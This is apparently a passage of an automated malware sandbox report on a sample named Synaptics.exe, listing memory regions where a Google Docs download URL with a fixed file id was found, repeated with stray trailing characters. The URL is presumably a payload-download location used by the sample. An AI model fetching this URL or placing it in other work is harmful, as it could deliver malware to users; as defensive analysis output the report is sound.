                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEp
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEy
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2475023226.000000000D60E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFj
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFk
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFq
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFz
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGf
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH:5.
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH?
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI/b
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI~
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJd
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKk
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMh
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMo
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadName
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNpd
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNy
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO=k_
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOa
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOe
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2515175472.000000001B47E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2514387079.000000001AE3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPj
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPk
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPq
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPz
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ0
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR?
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRn
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRw
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSe
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-Cq
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecurZ
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTh
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU/
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUIE.x
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUTZ
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUk
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVGRAy
                                      Source: Synaptics.exe, 00000002.00000002.2535106563.000000001CFE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWI
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXS
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY=
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYa
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYe
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFAD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ7
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZf
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZo
